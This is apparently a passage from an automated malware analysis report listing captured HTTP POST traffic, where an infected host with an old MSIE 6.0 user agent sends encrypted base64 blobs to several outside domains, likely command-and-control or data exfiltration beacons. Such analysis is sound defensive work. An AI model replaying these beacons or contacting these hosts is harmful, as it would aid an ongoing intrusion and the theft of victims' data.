                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 588User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.evcpa.comCache-Control: no-cacheData Raw: 34 39 41 58 45 67 70 72 71 31 55 33 44 6a 4f 2f 62 56 37 44 56 73 31 6f 49 63 43 36 7a 35 71 38 33 6c 31 67 30 46 39 44 71 32 32 79 49 2f 66 58 71 71 4a 4a 6c 66 65 73 6b 59 67 4a 2f 6b 62 50 6f 2b 4e 58 4c 44 67 71 67 51 46 44 33 68 38 69 62 4d 7a 30 4d 66 38 5a 39 46 37 42 62 30 6d 2b 57 53 49 43 36 74 4a 6f 4f 6b 71 55 2f 32 2f 5a 42 6f 37 64 2f 6a 73 37 33 48 4e 31 30 7a 4b 46 6a 4c 6a 64 37 73 57 68 65 2f 6f 64 75 6f 43 6d 31 38 33 36 55 38 4f 6a 7a 7a 67 38 6f 58 4d 47 52 36 47 37 52 6d 49 50 35 65 54 79 37 5a 2b 66 54 65 2b 75 35 30 38 44 4c 6b 49 7a 79 33 41 33 33 74 62 6f 79 37 70 46 54 70 72 62 4a 30 69 72 47 30 2f 35 59 64 6e 31 71 59 32 56 67 61 70 63 53 58 69 70 4f 45 64 44 66 7a 4e 6c 56 4f 43 5a 70 6f 4a 54 76 49 37 2b 4e 70 32 33 6a 51 45 38 6e 7a 30 39 48 78 6f 37 61 4b 70 41 70 4c 2b 57 34 54 55 4a 75 6b 2b 45 52 6b 36 4e 79 4c 4b 57 4e 79 50 69 46 56 4e 63 41 67 44 68 77 2b 6d 4a 4e 6c 7a 5a 6e 58 64 71 61 4d 33 46 6e 56 33 5a 4f 38 65 2f 6e 47 76 69 75 73 46 31 67 41 55 47 68 32 68 57 51 31 5a 65 57 6d 4a 35 67 4c 38 74 49 5a 30 57 72 51 67 4e 6e 6c 79 47 37 37 36 6f 4d 34 37 54 45 49 35 78 42 59 54 5a 5a 4f 45 63 79 63 4d 68 7a 6b 6e 79 77 53 74 4f 37 58 55 66 32 55 41 6e 63 61 52 6e 75 4a 4f 70 47 48 70 66 64 47 75 57 62 71 4a 38 4c 74 68 43 6c 79 77 65 69 65 4e 41 63 52 6d 73 47 35 75 35 46 41 6e 62 7a 68 7a 62 59 57 74 6c 48 50 51 45 48 47 53 6c 51 6b 4a 71 44 61 55 48 30 4b 75 44 75 6c 58 6c 36 73 77 42 2b 45 47 6a 35 31 62 57 2f 32 72 61 48 44 78 38 71 77 41 53 52 32 31 68 6a 36 73 74 61 50 36 4a 57 54 36 34 4b 44 49 70 67 42 47 30 53 4b 76 7a 45 4c 37 72 68 70 34 32 34 49 63 37 42 43 68 44 7a 50 4c 50 6f 79 59 45 4d 75 34 71 58 5a 50 70 68 53 37 4d 50 38 72 4e 52 68 58 7a 72 30 49 61 38 69 59 70 5a 30 47 62 Data Ascii: 49AXEgprq1U3DjO/bV7DVs1oIcC6z5q83l1g0F9Dq22yI/fXqqJJlfeskYgJ/kbPo+NXLDgqgQFD3h8ibMz0Mf8Z9F7Bb0m+WSIC6tJoOkqU/2/ZBo7d/js73HN10zKFjLjd7sWhe/oduoCm1836U8Ojzzg8oXMGR6G7RmIP5eTy7Z+fTe+u508DLkIzy3A33tboy7pFTprbJ0irG0/5Ydn1qY2VgapcSXipOEdDfzNlVOCZpoJTvI7+Np23jQE8nz09Hxo7aKpApL+W4TUJuk+ERk6NyLKWNyPiFVNcAgDhw+mJNlzZnXdqaM3FnV3ZO8e/nGviusF1gAUGh2hWQ1ZeWmJ5gL8tIZ0WrQgNnlyG776oM47TEI5xBYTZZOEcycMhzknywStO7XUf2UAncaRnuJOpGHpfdGuWbqJ8LthClyweieNAcRmsG5u5FAnbzhzbYWtlHPQEHGSlQkJqDaUH0KuDulXl6swB+EGj51bW/2raHDx8qwASR21hj6staP6JWT64KDIpgBG0SKvzEL7rhp424Ic7BChDzPLPoyYEMu4qXZPphS7MP8rNRhXzr0Ia8iYpZ0Gb
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 544User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.abart.plCache-Control: no-cacheData Raw: 42 59 48 58 42 54 59 46 71 31 57 78 74 49 30 58 6b 62 74 33 50 4e 6b 44 35 6b 68 57 63 2f 48 43 79 71 51 52 33 31 62 73 61 4d 64 39 31 44 57 78 56 52 39 5a 37 46 6f 45 4a 56 2b 53 77 39 68 79 39 51 47 57 6f 64 70 42 70 54 57 57 4d 4d 42 6e 64 77 31 48 37 76 34 73 36 72 78 39 54 7a 64 37 35 6a 4f 46 47 38 35 32 74 56 4b 35 2f 65 70 31 5a 6f 6c 65 58 39 72 78 65 47 76 78 43 41 79 47 47 70 47 72 61 72 61 65 57 34 78 69 66 39 71 31 55 4a 65 50 55 4f 77 42 72 56 35 41 77 4d 50 42 58 33 77 59 43 6c 6a 53 70 7a 61 49 4e 6c 6e 30 58 75 33 65 6a 54 71 46 43 52 72 79 4c 58 77 64 44 5a 41 57 32 49 79 72 39 50 55 49 37 43 62 46 49 59 2b 70 6d 78 62 33 6a 6f 62 4a 4a 68 52 53 2f 76 66 74 61 67 46 6e 36 33 32 62 65 6e 63 4b 4e 74 7a 6e 65 75 58 50 5a 33 71 57 31 30 67 4c 35 4d 51 51 45 57 71 42 4b 42 7a 77 33 56 35 73 47 74 7a 48 54 33 69 4a 50 5a 6b 68 39 6d 55 38 49 44 41 45 76 53 4a 76 33 41 49 68 38 39 44 32 4a 69 30 69 41 68 52 67 6b 58 46 59 6e 45 66 49 41 2b 49 30 49 4d 74 33 33 73 4b 35 44 30 76 61 56 5a 2f 6e 4b 77 42 4b 6a 76 50 76 45 57 35 30 54 6d 2b 39 47 52 4a 32 76 71 5a 38 2f 76 39 6b 5a 66 51 4b 51 6d 55 65 52 6c 35 65 6b 32 49 44 56 69 37 75 56 44 70 30 41 2b 65 35 46 78 67 6c 77 73 47 76 59 6e 36 71 72 4f 30 68 5a 7a 45 64 49 43 50 63 6e 6d 7a 77 47 59 4f 77 6d 71 45 51 57 47 6e 63 78 6f 55 4a 6b 74 64 37 6c 4f 46 5a 4f 6e 4f 42 4f 59 4e 69 47 34 44 66 77 48 43 51 30 7a 39 43 6c 55 30 56 51 68 6e 7a 4d 33 58 58 4f 69 44 79 6c 31 4c 31 48 46 44 73 57 2b 4e 7a 50 51 37 51 44 57 4a 37 6f 63 76 71 32 30 70 52 36 42 63 59 2f 4d 30 34 7a 4d 76 54 64 71 78 76 4b 4a 6f 50 53 78 4e 74 71 74 7a 33 69 68 6f 3d Data Ascii: BYHXBTYFq1WxtI0Xkbt3PNkD5khWc/HCyqQR31bsaMd91DWxVR9Z7FoEJV+Sw9hy9QGWodpBpTWWMMBndw1H7v4s6rx9Tzd75jOFG852tVK5/ep1ZoleX9rxeGvxCAyGGpGraraeW4xif9q1UJePUOwBrV5AwMPBX3wYCljSpzaINln0Xu3ejTqFCRryLXwdDZAW2Iyr9PUI7CbFIY+pmxb3jobJJhRS/vftagFn632bencKNtzneuXPZ3qW10gL5MQQEWqBKBzw3V5sGtzHT3iJPZkh9mU8IDAEvSJv3AIh89D2Ji0iAhRgkXFYnEfIA+I0IMt33sK5D0vaVZ/nKwBKjvPvEW50Tm+9GRJ2vqZ8/v9kZfQKQmUeRl5ek2IDVi7uVDp0A+e5FxglwsGvYn6qrO0hZzEdICPcnmzwGYOwmqEQWGncxoUJktd7lOFZOnOBOYNiG4DfwHCQ0z9ClU0VQhnzM3XXOiDyl1L1HFDsW+NzPQ7QDWJ7ocvq20pR6BcY/M04zMvTdqxvKJoPSxNtqtz3iho=
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 584User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.wifi4all.nlCache-Control: no-cacheData Raw: 34 41 4a 37 44 47 59 38 71 31 56 74 61 75 67 65 41 61 67 6e 74 6f 6d 79 58 37 39 47 63 75 6c 52 2b 6a 61 73 31 69 54 65 66 6d 37 44 51 47 59 31 59 79 43 35 45 52 51 38 73 59 6b 55 4d 45 48 4b 75 6a 34 30 54 44 42 56 38 56 39 62 46 35 4b 37 4a 74 30 36 61 4e 36 2b 50 59 4a 45 38 6f 38 4b 6a 74 34 73 61 65 38 76 4b 68 64 69 33 48 4c 2b 34 62 77 58 34 36 59 31 4b 70 2b 7a 38 43 71 65 62 38 44 4b 6d 6a 66 46 32 48 36 52 51 31 59 46 70 6d 6c 51 36 2b 6a 78 76 59 65 73 65 42 37 62 63 4b 4a 52 6c 55 56 56 34 41 67 72 70 6b 51 46 69 2b 37 61 39 34 73 36 37 2f 51 64 66 31 44 56 6b 77 6e 31 72 74 6d 70 4b 62 76 4f 38 48 4a 51 46 41 66 76 46 56 37 6b 5a 72 37 4e 45 39 33 45 68 78 30 75 4a 72 64 6d 6d 6a 55 4f 34 4f 79 74 49 4c 67 47 42 57 67 39 35 79 46 34 46 6e 75 30 54 36 38 6e 67 55 59 54 46 70 56 6c 36 35 47 34 55 4e 59 33 75 64 6c 6b 71 58 2f 42 32 79 6a 44 36 34 55 4e 56 7a 4b 41 64 54 4a 6d 43 31 78 66 74 5a 41 41 73 6f 6c 7a 32 56 65 52 55 67 4a 75 35 57 4a 64 4c 48 66 41 4a 6b 6c 75 73 4a 77 37 7a 43 5a 48 6b 75 75 71 61 4e 39 59 76 66 4b 54 61 37 6d 52 6d 76 46 2f 64 68 65 56 55 78 32 42 73 74 59 35 6b 73 32 73 71 71 61 6c 34 54 76 38 6e 4c 6b 36 36 66 49 6d 6c 4e 37 49 41 77 37 63 58 37 58 77 6f 4c 46 51 78 55 64 2b 32 45 33 77 5a 61 61 6b 59 33 4d 4c 62 6b 62 48 42 46 36 68 68 63 6a 64 4c 46 71 33 2b 64 30 2b 68 42 74 57 50 4c 4c 59 73 46 4b 55 54 50 46 51 6f 6a 51 61 65 4d 39 64 32 5a 35 46 41 74 38 43 47 4e 4c 38 77 71 68 33 72 4c 64 69 57 4e 77 31 32 67 70 61 44 50 30 51 46 59 4a 58 39 35 53 75 65 45 38 56 45 78 38 37 43 41 6d 57 70 58 68 78 77 65 33 75 6e 6b 52 54 50 57 6b 6e 38 54 42 45 39 56 68 52 59 6d 6e 6a 79 4b 42 52 67 6a 32 51 59 38 41 2f 30 51 53 30 6d 54 4c 4e 57 51 57 66 52 37 66 42 39 50 4e 4e 63 52 51 3d Data Ascii: 4AJ7DGY8q1VtaugeAagntomyX79GculR+jas1iTefm7DQGY1YyC5ERQ8sYkUMEHKuj40TDBV8V9bF5K7Jt06aN6+PYJE8o8Kjt4sae8vKhdi3HL+4bwX46Y1Kp+z8Cqeb8DKmjfF2H6RQ1YFpmlQ6+jxvYeseB7bcKJRlUVV4AgrpkQFi+7a94s67/Qdf1DVkwn1rtmpKbvO8HJQFAfvFV7kZr7NE93Ehx0uJrdmmjUO4OytILgGBWg95yF4Fnu0T68ngUYTFpVl65G4UNY3udlkqX/B2yjD64UNVzKAdTJmC1xftZAAsolz2VeRUgJu5WJdLHfAJklusJw7zCZHkuuqaN9YvfKTa7mRmvF/dheVUx2BstY5ks2sqqal4Tv8nLk66fImlN7IAw7cX7XwoLFQxUd+2E3wZaakY3MLbkbHBF6hhcjdLFq3+d0+hBtWPLLYsFKUTPFQojQaeM9d2Z5FAt8CGNL8wqh3rLdiWNw12gpaDP0QFYJX95SueE8VEx87CAmWpXhxwe3unkRTPWkn8TBE9VhRYmnjyKBRgj2QY8A/0QS0mTLNWQWfR7fB9PNNcRQ=
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 588User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.evcpa.comCache-Control: no-cacheData Raw: 34 39 41 58 45 67 70 72 71 31 55 33 44 6a 4f 2f 62 56 37 44 56 73 31 6f 49 63 43 36 7a 35 71 38 33 6c 31 67 30 46 39 44 71 32 32 79 49 2f 66 58 71 71 4a 4a 6c 66 65 73 6b 59 67 4a 2f 6b 62 50 6f 2b 4e 58 4c 44 67 71 67 51 46 44 33 68 38 69 62 4d 7a 30 4d 66 38 5a 39 46 37 42 62 30 6d 2b 57 53 49 43 36 74 4a 6f 4f 6b 71 55 2f 32 2f 5a 42 6f 37 64 2f 6a 73 37 33 48 4e 31 30 7a 4b 46 6a 4c 6a 64 37 73 57 68 65 2f 6f 64 75 6f 43 6d 31 38 33 36 55 38 4f 6a 7a 7a 67 38 6f 58 4d 47 52 36 47 37 52 6d 49 50 35 65 54 79 37 5a 2b 66 54 65 2b 75 35 30 38 44 4c 6b 49 7a 79 33 41 33 33 74 62 6f 79 37 70 46 54 70 72 62 4a 30 69 72 47 30 2f 35 59 64 6e 31 71 59 32 56 67 61 70 63 53 58 69 70 4f 45 64 44 66 7a 4e 6c 56 4f 43 5a 70 6f 4a 54 76 49 37 2b 4e 70 32 33 6a 51 45 38 6e 7a 30 39 48 78 6f 37 61 4b 70 41 70 4c 2b 57 34 54 55 4a 75 6b 2b 45 52 6b 36 4e 79 4c 4b 57 4e 79 50 69 46 56 4e 63 41 67 44 68 77 2b 6d 4a 4e 6c 7a 5a 6e 58 64 71 61 4d 33 46 6e 56 33 5a 4f 38 65 2f 6e 47 76 69 75 73 46 31 67 41 55 47 68 32 68 57 51 31 5a 65 57 6d 4a 35 67 4c 38 74 49 5a 30 57 72 51 67 4e 6e 6c 79 47 37 37 36 6f 4d 34 37 54 45 49 35 78 42 59 54 5a 5a 4f 45 63 79 63 4d 68 7a 6b 6e 79 77 53 74 4f 37 58 55 66 32 55 41 6e 63 61 52 6e 75 4a 4f 70 47 48 70 66 64 47 75 57 62 71 4a 38 4c 74 68 43 6c 79 77 65 69 65 4e 41 63 52 6d 73 47 35 75 35 46 41 6e 62 7a 68 7a 62 59 57 74 6c 48 50 51 45 48 47 53 6c 51 6b 4a 71 44 61 55 48 30 4b 75 44 75 6c 58 6c 36 73 77 42 2b 45 47 6a 35 31 62 57 2f 32 72 61 48 44 78 38 71 77 41 53 52 32 31 68 6a 36 73 74 61 50 36 4a 57 54 36 34 4b 44 49 70 67 42 47 30 53 4b 76 7a 45 4c 37 72 68 70 34 32 34 49 63 37 42 43 68 44 7a 50 4c 50 6f 79 59 45 4d 75 34 71 58 5a 50 70 68 53 37 4d 50 38 72 4e 52 68 58 7a 72 30 49 61 38 69 59 70 5a 30 47 62 Data Ascii: 49AXEgprq1U3DjO/bV7DVs1oIcC6z5q83l1g0F9Dq22yI/fXqqJJlfeskYgJ/kbPo+NXLDgqgQFD3h8ibMz0Mf8Z9F7Bb0m+WSIC6tJoOkqU/2/ZBo7d/js73HN10zKFjLjd7sWhe/oduoCm1836U8Ojzzg8oXMGR6G7RmIP5eTy7Z+fTe+u508DLkIzy3A33tboy7pFTprbJ0irG0/5Ydn1qY2VgapcSXipOEdDfzNlVOCZpoJTvI7+Np23jQE8nz09Hxo7aKpApL+W4TUJuk+ERk6NyLKWNyPiFVNcAgDhw+mJNlzZnXdqaM3FnV3ZO8e/nGviusF1gAUGh2hWQ1ZeWmJ5gL8tIZ0WrQgNnlyG776oM47TEI5xBYTZZOEcycMhzknywStO7XUf2UAncaRnuJOpGHpfdGuWbqJ8LthClyweieNAcRmsG5u5FAnbzhzbYWtlHPQEHGSlQkJqDaUH0KuDulXl6swB+EGj51bW/2raHDx8qwASR21hj6staP6JWT64KDIpgBG0SKvzEL7rhp424Ic7BChDzPLPoyYEMu4qXZPphS7MP8rNRhXzr0Ia8iYpZ0Gb
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 596User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.t-tre.comCache-Control: no-cacheData Raw: 43 4e 51 7a 4b 42 4a 7a 74 46 55 46 2b 65 2b 41 78 66 63 7a 75 52 57 61 75 6e 35 69 7a 48 54 65 5a 68 71 46 44 39 33 7a 63 6a 46 77 49 6e 68 6d 6e 6b 51 52 32 2f 4c 32 41 64 4e 6c 4e 37 76 58 77 7a 6a 6a 72 34 78 71 51 50 43 58 6a 6d 66 46 47 70 6b 2b 32 77 76 35 32 39 4c 33 4a 52 70 38 74 45 70 56 45 74 68 51 41 52 6c 65 42 66 6d 6d 37 6b 4d 39 63 62 52 74 50 5a 47 6f 56 74 76 36 68 6f 68 4b 68 4a 44 47 4a 61 2b 52 36 53 34 31 45 77 61 75 41 6d 5a 75 69 65 65 4c 4d 6c 37 2f 34 62 4b 55 32 46 35 30 50 38 74 2b 36 62 6a 6a 45 43 69 76 32 65 65 45 78 61 69 6e 4d 7a 46 6a 51 70 56 6a 56 68 4e 45 59 33 34 67 6c 67 48 45 6f 41 67 50 74 6b 35 72 2b 31 7a 6c 59 54 70 30 38 65 30 69 43 4f 6a 68 49 66 75 41 55 47 50 63 4f 36 35 4e 79 58 61 50 71 73 6b 63 6e 58 4a 61 31 4b 59 4b 5a 31 4a 6e 72 79 56 59 2b 52 68 71 67 74 38 35 33 39 76 71 41 42 59 36 39 72 36 34 4e 4e 72 32 2b 75 53 6f 52 55 59 78 6c 74 72 78 73 4e 46 4e 71 44 49 4d 41 53 65 52 66 77 55 67 77 6d 42 68 7a 4a 7a 6e 6d 55 34 54 73 44 32 51 7a 64 6c 6c 5a 61 45 6d 45 72 52 7a 4e 37 75 7a 4b 43 48 75 6f 4e 48 6b 6c 4f 61 4e 45 4e 33 34 30 68 62 67 33 39 4a 46 35 6b 38 63 39 59 51 76 2b 73 4f 61 47 2b 69 55 47 31 4a 50 54 65 45 43 44 75 59 42 75 34 54 5a 65 32 48 74 4c 41 37 64 67 5a 79 4f 70 7a 64 50 52 6c 58 44 55 6c 63 76 73 69 66 33 2b 4b 54 30 33 7a 57 48 32 55 6a 34 75 36 4f 6e 2b 6d 67 32 2b 30 63 62 71 36 36 72 5a 51 65 55 30 64 4a 71 5a 31 52 6f 66 65 43 6e 6f 35 4d 35 79 72 48 75 2b 47 76 57 6c 64 68 51 47 50 79 44 58 37 71 55 42 44 72 62 7a 73 2f 6c 6a 7a 2f 68 30 4d 41 4b 46 39 33 70 48 38 67 5a 47 7a 34 41 30 52 57 39 43 49 47 2b 78 31 65 4c 63 47 6f 4b 32 44 44 6d 79 4b 7a 39 33 52 68 77 32 4a 72 66 67 64 31 38 62 6c 59 36 67 6c 56 6d 62 53 37 34 73 6e 34 69 64 44 66 4e 6c 2b 49 6b 58 31 75 67 Data Ascii: CNQzKBJztFUF+e+AxfczuRWaun5izHTeZhqFD93zcjFwInhmnkQR2/L2AdNlN7vXwzjjr4xqQPCXjmfFGpk+2wv529L3JRp8tEpVEthQARleBfmm7kM9cbRtPZGoVtv6hohKhJDGJa+R6S41EwauAmZuieeLMl7/4bKU2F50P8t+6bjjECiv2eeExainMzFjQpVjVhNEY34glgHEoAgPtk5r+1zlYTp08e0iCOjhIfuAUGPcO65NyXaPqskcnXJa1KYKZ1JnryVY+Rhqgt8539vqABY69r64NNr2+uSoRUYxltrxsNFNqDIMASeRfwUgwmBhzJznmU4TsD2QzdllZaEmErRzN7uzKCHuoNHklOaNEN340hbg39JF5k8c9YQv+sOaG+iUG1JPTeECDuYBu4TZe2HtLA7dgZyOpzdPRlXDUlcvsif3+KT03zWH2Uj4u6On+mg2+0cbq66rZQeU0dJqZ1RofeCno5M5yrHu+GvWldhQGPyDX7qUBDrbzs/ljz/h0MAKF93pH8gZGz4A0RW9CIG+x1eLcGoK2DDmyKz93Rhw2Jrfgd18blY6glVmbS74sn4idDfNl+IkX1ug
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 572User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.abdg.comCache-Control: no-cacheData Raw: 4a 70 36 66 45 6e 56 76 71 31 56 4b 79 36 72 51 33 44 72 35 78 6d 37 4c 49 6c 59 44 41 45 77 6b 65 61 50 7a 72 52 34 66 55 77 79 71 4b 31 61 77 78 4e 70 73 35 43 57 55 54 59 59 6d 36 78 4f 49 75 4d 59 4c 73 4e 4b 75 78 63 73 58 69 6a 71 6b 42 41 48 36 78 77 4e 64 2f 41 4b 4d 45 37 54 68 54 52 76 74 58 46 6c 6b 70 62 68 6d 4a 76 43 41 31 73 54 53 32 54 38 47 51 42 6c 72 6c 45 2f 77 6c 46 35 43 66 5a 31 64 32 50 68 64 4a 38 52 35 64 64 57 46 52 5a 4b 62 78 53 2b 42 7a 78 72 39 79 44 4e 58 46 58 63 47 62 44 4e 31 7a 68 2b 64 72 67 75 7a 61 4e 70 48 32 37 6d 73 59 41 39 35 42 50 56 50 58 55 54 59 4a 6f 47 45 74 49 78 61 43 4f 41 46 71 4f 6e 70 38 4c 4a 61 30 64 2b 51 52 5a 49 77 56 4e 65 73 4a 4b 63 75 4c 4e 44 65 46 74 61 36 58 55 4e 35 39 37 53 30 34 4f 66 57 45 43 46 71 52 55 42 68 76 6e 2b 59 68 79 74 36 57 64 64 37 64 58 43 76 48 38 46 4e 6e 39 77 56 51 56 57 76 79 46 4d 4c 76 54 69 64 42 51 41 38 4f 77 41 57 71 35 42 4f 47 32 53 67 54 58 53 4d 66 39 41 70 44 5a 35 35 72 66 69 4c 31 6c 38 36 56 50 5a 41 54 2f 41 57 71 55 38 71 63 4c 4c 51 30 2b 55 63 6f 37 63 6a 6a 48 2f 58 70 78 55 54 66 68 47 47 58 35 48 38 74 79 6f 64 35 59 4f 44 4b 30 72 58 50 48 31 56 38 4b 6d 4f 67 6e 38 32 4f 7a 54 36 79 68 45 39 45 71 43 6c 6a 45 7a 74 2b 48 37 51 53 4a 4e 62 73 61 54 64 50 44 63 57 77 4e 53 5a 68 46 74 6c 70 6b 68 32 68 38 31 6e 75 57 4f 4a 63 4c 47 35 39 77 68 71 47 73 4c 39 70 76 48 64 62 34 30 74 75 73 70 38 4f 54 59 6d 42 5a 78 62 4c 56 6e 75 35 44 54 76 69 4c 33 4d 63 41 7a 36 49 57 6f 42 6d 76 75 42 4e 50 31 6f 59 4e 6c 7a 49 34 6a 37 46 55 4a 51 62 52 4d 4f 66 5a 63 6b 43 4d 52 45 4e 6c 44 78 44 62 34 43 6a 76 57 50 71 48 33 74 37 51 48 43 67 71 59 51 30 38 33 39 35 36 49 33 4f 78 63 3d Data Ascii: Jp6fEnVvq1VKy6rQ3Dr5xm7LIlYDAEwkeaPzrR4fUwyqK1awxNps5CWUTYYm6xOIuMYLsNKuxcsXijqkBAH6xwNd/AKME7ThTRvtXFlkpbhmJvCA1sTS2T8GQBlrlE/wlF5CfZ1d2PhdJ8R5ddWFRZKbxS+Bzxr9yDNXFXcGbDN1zh+drguzaNpH27msYA95BPVPXUTYJoGEtIxaCOAFqOnp8LJa0d+QRZIwVNesJKcuLNDeFta6XUN597S04OfWECFqRUBhvn+Yhyt6Wdd7dXCvH8FNn9wVQVWvyFMLvTidBQA8OwAWq5BOG2SgTXSMf9ApDZ55rfiL1l86VPZAT/AWqU8qcLLQ0+Uco7cjjH/XpxUTfhGGX5H8tyod5YODK0rXPH1V8KmOgn82OzT6yhE9EqCljEzt+H7QSJNbsaTdPDcWwNSZhFtlpkh2h81nuWOJcLG59whqGsL9pvHdb40tusp8OTYmBZxbLVnu5DTviL3McAz6IWoBmvuBNP1oYNlzI4j7FUJQbRMOfZckCMRENlDxDb4CjvWPqH3t7QHCgqYQ083956I3Oxc=
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 552User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.domon.comCache-Control: no-cacheCookie: __cf_bm=bG7aGS9BVVg0sRmxAgVEHshxh_IUaylULZnnrKAZthw-1688537177-0-Ad2ypDuBBLd93obDicSBXDOOQyPU7Psl9Aylem5rntUccmgjEu7zZ4vGUse61szb3qyCxcMNQXOXcHQ8/uNp0b0=Data Raw: 6d 2f 36 78 31 64 45 6a 4d 34 37 4e 6f 79 35 2f 63 41 71 32 56 43 72 6f 71 53 53 50 6b 59 2b 71 6c 5a 63 4c 6f 68 65 39 2b 42 41 62 53 65 41 70 50 30 57 64 6a 58 39 67 47 31 67 4c 74 6c 79 36 62 64 6b 51 49 75 34 30 51 4a 57 55 4b 4c 4e 45 30 73 64 74 46 43 61 39 7a 51 6d 39 30 6e 6a 2b 48 4b 34 7a 4b 52 66 6f 32 53 6b 56 65 55 77 6a 74 74 4f 32 61 64 75 6b 2b 78 55 73 38 55 38 59 6b 44 4a 35 53 74 44 6b 76 51 69 72 6b 5a 4a 64 61 68 30 7a 4a 33 65 31 4d 4e 47 72 43 71 31 4f 62 6a 45 2b 43 32 43 6b 71 32 50 52 56 58 36 6d 6e 50 69 4e 57 5a 31 47 35 4f 73 6f 36 79 2f 4d 42 38 71 77 73 4c 46 74 51 76 6c 45 4a 72 30 36 59 63 6c 47 61 30 35 34 70 44 4e 64 6b 73 71 6c 36 2b 53 4c 41 49 38 33 65 53 4b 4a 67 59 43 54 2f 66 78 43 4b 4f 72 42 2b 64 59 75 56 32 57 44 54 78 69 48 6f 72 67 6a 42 35 2b 41 4c 34 47 71 33 7a 31 6f 7a 71 4c 4e 76 50 6e 6a 57 70 4e 73 58 48 4f 7a 71 4f 6e 71 35 30 6e 4e 79 74 61 4f 43 37 42 69 5a 38 55 30 4e 45 4b 69 75 43 78 45 45 2b 6f 4b 50 79 78 5a 61 41 71 61 45 59 69 75 6e 49 49 41 4e 4d 55 36 70 4c 51 62 6e 4b 37 32 75 66 30 6f 63 70 33 5a 7a 51 6a 4c 42 56 6c 75 73 31 35 6d 54 68 4c 6e 47 51 39 35 39 6c 65 67 77 33 5a 32 73 51 62 38 4c 51 68 65 63 52 75 4e 35 6d 66 70 31 46 6c 2b 71 63 32 4e 4f 43 38 5a 6e 58 44 56 37 38 6c 41 55 79 43 42 33 57 36 72 59 56 74 2b 70 47 56 32 52 70 30 55 67 65 30 6a 76 6a 4e 56 79 4a 4c 67 6e 57 5a 68 65 69 4f 4e 66 73 33 57 54 41 62 4a 47 66 53 72 35 74 49 6e 6a 55 73 47 4c 65 33 38 6d 35 59 71 64 49 65 7a 52 4f 73 41 76 46 78 42 62 4c 62 33 77 68 48 64 58 4b 6b 76 34 32 4c 6f 6a 6e 38 68 63 6d 66 6f 56 44 7a 56 51 31 52 51 30 45 75 32 67 77 75 68 66 45 78 56 69 77 3d 3d Data Ascii: m/6x1dEjM47Noy5/cAq2VCroqSSPkY+qlZcLohe9+BAbSeApP0WdjX9gG1gLtly6bdkQIu40QJWUKLNE0sdtFCa9zQm90nj+HK4zKRfo2SkVeUwjttO2aduk+xUs8U8YkDJ5StDkvQirkZJdah0zJ3e1MNGrCq1ObjE+C2Ckq2PRVX6mnPiNWZ1G5Oso6y/MB8qwsLFtQvlEJr06YclGa054pDNdksql6+SLAI83eSKJgYCT/fxCKOrB+dYuV2WDTxiHorgjB5+AL4Gq3z1ozqLNvPnjWpNsXHOzqOnq50nNytaOC7BiZ8U0NEKiuCxEE+oKPyxZaAqaEYiunIIANMU6pLQbnK72uf0ocp3ZzQjLBVlus15mThLnGQ959legw3Z2sQb8LQhecRuN5mfp1Fl+qc2NOC8ZnXDV78lAUyCB3W6rYVt+pGV2Rp0Uge0jvjNVyJLgnWZheiONfs3WTAbJGfSr5tInjUsGLe38m5YqdIezROsAvFxBbLb3whHdXKkv42Lojn8hcmfoVDzVQ1RQ0Eu2gwuhfExViw==
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 596User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.t-tre.comCache-Control: no-cacheData Raw: 43 4e 51 7a 4b 42 4a 7a 74 46 55 46 2b 65 2b 41 78 66 63 7a 75 52 57 61 75 6e 35 69 7a 48 54 65 5a 68 71 46 44 39 33 7a 63 6a 46 77 49 6e 68 6d 6e 6b 51 52 32 2f 4c 32 41 64 4e 6c 4e 37 76 58 77 7a 6a 6a 72 34 78 71 51 50 43 58 6a 6d 66 46 47 70 6b 2b 32 77 76 35 32 39 4c 33 4a 52 70 38 74 45 70 56 45 74 68 51 41 52 6c 65 42 66 6d 6d 37 6b 4d 39 63 62 52 74 50 5a 47 6f 56 74 76 36 68 6f 68 4b 68 4a 44 47 4a 61 2b 52 36 53 34 31 45 77 61 75 41 6d 5a 75 69 65 65 4c 4d 6c 37 2f 34 62 4b 55 32 46 35 30 50 38 74 2b 36 62 6a 6a 45 43 69 76 32 65 65 45 78 61 69 6e 4d 7a 46 6a 51 70 56 6a 56 68 4e 45 59 33 34 67 6c 67 48 45 6f 41 67 50 74 6b 35 72 2b 31 7a 6c 59 54 70 30 38 65 30 69 43 4f 6a 68 49 66 75 41 55 47 50 63 4f 36 35 4e 79 58 61 50 71 73 6b 63 6e 58 4a 61 31 4b 59 4b 5a 31 4a 6e 72 79 56 59 2b 52 68 71 67 74 38 35 33 39 76 71 41 42 59 36 39 72 36 34 4e 4e 72 32 2b 75 53 6f 52 55 59 78 6c 74 72 78 73 4e 46 4e 71 44 49 4d 41 53 65 52 66 77 55 67 77 6d 42 68 7a 4a 7a 6e 6d 55 34 54 73 44 32 51 7a 64 6c 6c 5a 61 45 6d 45 72 52 7a 4e 